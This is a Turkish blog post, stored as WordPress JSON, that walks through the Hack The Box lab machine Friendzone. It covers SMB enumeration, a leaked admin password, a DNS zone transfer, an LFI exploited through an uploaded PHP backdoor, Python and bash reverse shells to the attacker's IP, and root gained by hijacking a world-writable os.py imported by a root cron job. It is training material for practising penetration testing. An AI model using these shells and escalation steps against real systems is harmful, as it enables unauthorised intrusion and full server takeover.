{"id":1534,"date":"2021-09-03T18:33:06","date_gmt":"2021-09-03T18:33:06","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1534"},"modified":"2021-09-03T18:33:06","modified_gmt":"2021-09-03T18:33:06","slug":"friendzone","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/03\/friendzone\/","title":{"rendered":"Friendzone"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/173\" title=\"Friendzone\">Friendzone<\/a> - HTB<\/td>\n<td>Orta<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/85202d08993c628f3b90a7c4299a4019.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131:<\/p>\n<pre><code>ne yaz\u0131kki notlar\u0131ma almay\u0131 unutmu\u015fum... Ancak hat\u0131rlad\u0131\u011f\u0131m kadr\u0131yla smb 443 ve 53 a\u00e7\u0131kt\u0131.<\/code><\/pre>\n<p>Kendime bir not smb g\u00f6rd\u00fckten sonra nmap ile script taramas\u0131da at\u0131lmal\u0131.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500#   nmap --script smb-enum-shares.nse -p445 10.10.10.123\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-08-31 15:00 EDT\nNmap scan report for friendzone.red (10.10.10.123)\nHost is up (0.071s latency).\n\nPORT    STATE SERVICE\n445\/tcp open  microsoft-ds\n\nHost script results:\n| smb-enum-shares: \n|   account_used: guest\n|   \\\\10.10.10.123\\Development: \n|     Type: STYPE_DISKTREE\n|     Comment: FriendZone Samba Server Files\n|     Users: 1\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\etc\\Development\n|     Anonymous access: READ\/WRITE\n|     Current user access: READ\/WRITE\n|   \\\\10.10.10.123\\Files: \n|     Type: STYPE_DISKTREE\n|     Comment: FriendZone Samba Server Files \/etc\/Files\n|     Users: 0\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\etc\\hole\n|     Anonymous access: &lt;none&gt;\n|     Current user access: &lt;none&gt;\n|   \\\\10.10.10.123\\IPC$: \n|     Type: STYPE_IPC_HIDDEN\n|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))\n|     Users: 1\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\tmp\n|     Anonymous access: READ\/WRITE\n|     Current user access: READ\/WRITE\n|   \\\\10.10.10.123\\general: \n|     Type: STYPE_DISKTREE\n|     Comment: FriendZone Samba Server Files\n|     Users: 0\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\etc\\general\n|     Anonymous access: READ\/WRITE\n|     Current user access: READ\/WRITE\n|   \\\\10.10.10.123\\print$: \n|     Type: STYPE_DISKTREE\n|     Comment: Printer Drivers\n|     Users: 0\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\var\\lib\\samba\\printers\n|     Anonymous access: &lt;none&gt;\n|_    Current user access: &lt;none&gt;\n\nNmap done: 1 IP address (1 host up) scanned in 18.13 seconds<\/code><\/pre>\n<p>Daha sonras\u0131nda enum4linux ile devam edelim.<\/p>\n<pre><code class=\"language-sh\">\nStarting smbmap scan\n\n    ----                                                    ----------- -------\n    print$                                              NO ACCESS   Printer Drivers\n    Files                                               NO ACCESS   FriendZone Samba Server Files \/etc\/Files\n    general                                             READ ONLY   FriendZone Samba Server Files\n    Development                                         READ, WRITE FriendZone Samba Server Files\n    IPC$                                                NO ACCESS   IPC Service (FriendZone server (Samba, Ubuntu))\n<\/code><\/pre>\n<p>Bir creds.txt dosyas\u0131 buldum.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500# smbclient -W &#039;WORKGROUP&#039; \/\/&#039;10.10.10.123&#039;\/&#039;general&#039; -U&#039;&#039;%&#039;&#039;\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Wed Jan 16 15:10:51 2019\n  ..                                  D        0  Wed Jan 23 16:51:02 2019\n  creds.txt                           N       57  Tue Oct  9 19:52:42 2018\n\n        9221460 blocks of size 1024. 6410736 blocks available\nsmb: \\&gt; get creds.txt\ngetting file \\creds.txt of size 57 as creds.txt (0.2 KiloBytes\/sec) (average 0.2 KiloBytes\/sec)\nsmb: \\&gt; exit\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500# cat creds.txt                      \ncreds for the admin THING:\n\nadmin:WORKWORKHhallelujah@#\n<\/code><\/pre>\n<p>53 a\u00e7\u0131k oldu\u011fu i\u00e7in dns zone transfer denedim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# host -l &quot;friendzone.red&quot;  10.10.10.123\nUsing domain server:\nName: 10.10.10.123\nAddress: 10.10.10.123#53\nAliases: \n\nfriendzone.red has IPv6 address ::1\nfriendzone.red name server localhost.\nfriendzone.red has address 127.0.0.1\nadministrator1.friendzone.red has address 127.0.0.1\nhr.friendzone.red has address 127.0.0.1\nuploads.friendzone.red has address 127.0.0.1<\/code><\/pre>\n<p>Bunlar\u0131 daha sonras\u0131nda \/etc\/hosts'ta ekleyip devam ettim. smb ile enum yapt\u0131\u011f\u0131mda development'\u0131n path'ini tespit etmi\u015ftik. Ayn\u0131 zamanda :<\/p>\n<pre><code>https:\/\/administrator1.friendzone.red\/dashboard.php?image_id=a.jpg&amp;pagename=&lt;LFI&gt; <\/code><\/pre>\n<p>adresinde bir lfi tespit ettim. development pathine yazma hakk\u0131m\u0131z var lfi'\u0131m\u0131z var. O zaman reverse alabiliriz.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500# smbclient -W &#039;WORKGROUP&#039; \/\/&#039;10.10.10.123&#039;\/&#039;Development&#039; -U&#039;&#039;%&#039;&#039; \nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Tue Aug 31 16:14:31 2021\n  ..                                  D        0  Wed Jan 23 16:51:02 2019\n\n        9221460 blocks of size 1024. 6460340 blocks available\nsmb: \\&gt; put simple-backdoor.php\nputting file simple-backdoor.php as \\simple-backdoor.php (1.5 kb\/s) (average 1.5 kb\/s)\nsmb: \\&gt; ls\n  .                                   D        0  Tue Aug 31 16:15:29 2021\n  ..                                  D        0  Wed Jan 23 16:51:02 2019\n  simple-backdoor.php                 A      328  Tue Aug 31 16:15:29 2021\n\n        9221460 blocks of size 1024. 6460336 blocks available\nsmb: \\&gt; <\/code><\/pre>\n<pre><code class=\"language-sh\">https:\/\/administrator1.friendzone.red\/dashboard.php?image_id=a.jpg&amp;pagename=\/etc\/Development\/simple-backdoor<\/code><\/pre>\n<p>adresine gitti\u011fimizde <code>python -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.4&quot;,1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code> payload\u0131 ile reverse ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500# nc -lvp 1111                                         \nlistening on [any] 1111 ...\nconnect to [10.10.14.4] from friendzone.red [10.10.10.123] 59346\nwww-data@FriendZone:\/var\/www\/admin$ id\nid\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nwww-data@FriendZone:\/var\/www\/admin$ cd \/home\ncd \/home\nwww-data@FriendZone:\/home$ ls\nls\nfriend\nwww-data@FriendZone:\/home$ cd friend\ncd friend\nwww-data@FriendZone:\/home\/friend$ ls\nls\nuser.txt\nwww-data@FriendZone:\/home\/friend$ cat user.txt\ncat user.txt\na9ed20acecd6c5b6b52f474e15ae9a11<\/code><\/pre>\n<p>Bilgi toplama a\u015famas\u0131nda yazabildi\u011fimiz dosyalarda python k\u00fct\u00fcphanelerini g\u00f6rd\u00fcm.<\/p>\n<pre><code class=\"language-sh\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Interesting writable files owned by me or writable by everyone (not in Home) (max 500)\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#writable-files\n\/dev\/mqueue\n\/dev\/shm\n\/etc\/Development\n\/etc\/Development\/simple-backdoor.php\n\/etc\/sambafiles\n\/home\/friend\n\/run\/lock\n\/run\/user\/1000\n\/run\/user\/1000\/gnupg\n\/run\/user\/1000\/systemd\n\/tmp\n\/tmp\/.font-unix\n\/tmp\/.ICE-unix\n\/tmp\/linpeas.sh\n\/tmp\/result1\n\/tmp\/.Test-unix\n#)You_can_write_even_more_files_inside_last_directory\n\n\/usr\/lib\/python2.7\n\/usr\/lib\/python2.7\/os.py\n\/usr\/lib\/python2.7\/os.pyc\n\/var\/lib\/php\/sessions\n\/var\/mail\/friend\n\/var\/spool\/samba\n\/var\/tmp\n<\/code><\/pre>\n<p>.\/pspy32s  ile bir ne oluyor diye dinledim.<\/p>\n<pre><code class=\"language-sh\">\nfriend@FriendZone:\/tmp$ .\/pspy32s \npspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855\n\n     \u2588\u2588\u2593\u2588\u2588\u2588    \u2588\u2588\u2588\u2588\u2588\u2588  \u2588\u2588\u2593\u2588\u2588\u2588 \u2593\u2588\u2588   \u2588\u2588\u2593\n    \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588    \u2592 \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588  \u2588\u2588\u2592\n    \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2591 \u2593\u2588\u2588\u2584   \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592 \u2592\u2588\u2588 \u2588\u2588\u2591\n    \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592  \u2592   \u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592 \u2591 \u2590\u2588\u2588\u2593\u2591\n    \u2592\u2588\u2588\u2592 \u2591  \u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592 \u2591  \u2591 \u2591 \u2588\u2588\u2592\u2593\u2591\n    \u2592\u2593\u2592\u2591 \u2591  \u2591\u2592 \u2592\u2593\u2592 \u2592 \u2591\u2592\u2593\u2592\u2591 \u2591  \u2591  \u2588\u2588\u2592\u2592\u2592 \n    \u2591\u2592 \u2591     \u2591 \u2591\u2592  \u2591 \u2591\u2591\u2592 \u2591     \u2593\u2588\u2588 \u2591\u2592\u2591 \n    \u2591\u2591       \u2591  \u2591  \u2591  \u2591\u2591       \u2592 \u2592 \u2591\u2591  \n                   \u2591           \u2591 \u2591     \n                               \u2591 \u2591     \n\nConfig: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [\/usr \/tmp \/etc \/home \/var \/opt] (recursive) | [] (non-recursive)\nDraining file system events due to startup...\ndone\n2021\/09\/01 00:23:43 CMD: UID=0    PID=98     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=9      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=89     | \n2021\/09\/01 00:23:43 CMD: UID=107  PID=862    | \/usr\/sbin\/exim4 -bd -q30m \n2021\/09\/01 00:23:43 CMD: UID=0    PID=854    | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=853    | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=852    | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=85     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=82     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=81     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=80     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=8      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=79     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=78     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=77     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=711    | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=7      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=6      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=577    | \/usr\/sbin\/nmbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=5498   | \/usr\/bin\/gpg-agent --supervised \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=54384  | .\/pspy32s \n2021\/09\/01 00:23:43 CMD: UID=0    PID=54344  | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=54301  | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=54230  | \n2021\/09\/01 00:23:43 CMD: UID=33   PID=488    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=33   PID=487    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=33   PID=486    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=33   PID=485    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=33   PID=484    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=0    PID=482    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=0    PID=478    | \/sbin\/agetty -o -p -- \\u --noclear tty1 linux \n2021\/09\/01 00:23:43 CMD: UID=0    PID=469    | \/usr\/sbin\/vsftpd \/etc\/vsftpd.conf \n2021\/09\/01 00:23:43 CMD: UID=0    PID=465    | \/usr\/sbin\/sshd -D \n2021\/09\/01 00:23:43 CMD: UID=109  PID=458    | \/usr\/sbin\/named -f -4 -u bind \n2021\/09\/01 00:23:43 CMD: UID=0    PID=4      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=397    | \/usr\/bin\/VGAuthService \n2021\/09\/01 00:23:43 CMD: UID=103  PID=391    | \/usr\/bin\/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only \n2021\/09\/01 00:23:43 CMD: UID=102  PID=390    | \/usr\/sbin\/rsyslogd -n \n2021\/09\/01 00:23:43 CMD: UID=0    PID=389    | \/lib\/systemd\/systemd-logind \n2021\/09\/01 00:23:43 CMD: UID=0    PID=383    | \/usr\/sbin\/cron -f \n2021\/09\/01 00:23:43 CMD: UID=0    PID=381    | \/usr\/bin\/python3 \/usr\/bin\/networkd-dispatcher --run-startup-triggers \n2021\/09\/01 00:23:43 CMD: UID=0    PID=380    | \/usr\/lib\/accountsservice\/accounts-daemon \n2021\/09\/01 00:23:43 CMD: UID=0    PID=35     | \n2021\/09\/01 00:23:43 CMD: UID=62583 PID=346    | \/lib\/systemd\/systemd-timesyncd \n2021\/09\/01 00:23:43 CMD: UID=101  PID=345    | \/lib\/systemd\/systemd-resolved \n2021\/09\/01 00:23:43 CMD: UID=0    PID=34     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=32     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=30     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=29     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=28     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=27     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=26     | \n2021\/09\/01 00:23:43 CMD: UID=100  PID=254    | \/lib\/systemd\/systemd-networkd \n2021\/09\/01 00:23:43 CMD: UID=0    PID=253    | \/lib\/systemd\/systemd-udevd \n2021\/09\/01 00:23:43 CMD: UID=0    PID=25     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=24     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=23     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=228    | \/usr\/bin\/vmtoolsd \n2021\/09\/01 00:23:43 CMD: UID=0    PID=227    | \/lib\/systemd\/systemd-journald \n2021\/09\/01 00:23:43 CMD: UID=0    PID=22     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=21     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=20     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=2      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=196    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=195    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=19     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=18     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=174    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=173    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=172    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=170    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=17     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=169    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=168    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=16     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=15     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=14     | \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1321   | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1301   | -bash \n2021\/09\/01 00:23:43 CMD: UID=0    PID=13     | \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1299   | sshd: friend@pts\/1   \n2021\/09\/01 00:23:43 CMD: UID=0    PID=1273   | sshd: friend [priv]  \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1258   | bash \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1248   | (sd-pam) \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1247   | \/lib\/systemd\/systemd --user \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1246   | su friend \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1223   | \/bin\/bash \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1222   | python -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.4&quot;,1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/bash&quot;) \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1221   | sh -c python -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.4&quot;,1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/bash&quot;)&#039; \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1206   | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=0    PID=12     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=1195   | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=115    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=11     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=10     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=1      | \/sbin\/init splash \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54394  | \/usr\/bin\/python \/opt\/server_admin\/reporter.py \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54393  | \/bin\/sh -c \/opt\/server_admin\/reporter.py \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54392  | \/usr\/sbin\/CRON -f \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54396  | bash \/tmp\/shell.sh \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54395  | sh -c bash \/tmp\/shell.sh \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54397  | bash \/tmp\/shell.sh \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54402  | \/bin\/sh \/usr\/bin\/lesspipe \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54401  | \/bin\/sh \/usr\/bin\/lesspipe \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54400  | bash -i \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54406  | dircolors -b \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54405  | bash -i <\/code><\/pre>\n<pre><code>2021\/09\/01 00:24:01 CMD: UID=0    PID=54394  | \/usr\/bin\/python \/opt\/server_admin\/reporter.py <\/code><\/pre>\n<p>\u015eimdi bu dosyay\u0131 manip\u00fcle edelim.<\/p>\n<pre><code class=\"language-sh\">\nfriend@FriendZone:\/tmp$ cat shell.sh \nbash -i &gt;&amp; \/dev\/tcp\/10.10.14.4\/1234 0&gt;&amp;1<\/code><\/pre>\n<pre><code class=\"language-sh\">\nfriend@FriendZone:\/tmp$ tail \/usr\/lib\/python2.7\/os.py\ntry:\n    _copy_reg.pickle(statvfs_result, _pickle_statvfs_result,\n                     _make_statvfs_result)\nexcept NameError: # statvfs_result may not exist\n    pass\n\nsystem(&quot;bash \/tmp\/shell.sh&quot;)\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# nc -lvp 1234\nlistening on [any] 1234 ...\nconnect to [10.10.14.4] from friendzone.red [10.10.10.123] 49692\nbash: cannot set terminal process group (54393): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@FriendZone:~# id\nid\nuid=0(root) gid=0(root) groups=0(root)\nroot@FriendZone:~# cd \/root\ncd \/root\nroot@FriendZone:~# ls\nls\ncerts\nroot.txt\nroot@FriendZone:~# cat root.txt\ncat root.txt\nb0e6c60b82cf96e9855ac1656a9e90c7\nroot@FriendZone:~# \n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Friendzone &#8211; HTB Orta Linux Walkthrough nmap taramas\u0131: ne yaz\u0131kki notlar\u0131ma almay\u0131 unutmu\u015fum&#8230; Ancak hat\u0131rlad\u0131\u011f\u0131m kadr\u0131yla smb 443 ve 53&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/03\/friendzone\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Friendzone<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1534","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1534","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1534"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1534\/revisions"}],"predecessor-version":[{"id":1535,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1534\/revisions\/1535"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1534"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1534"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1534"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}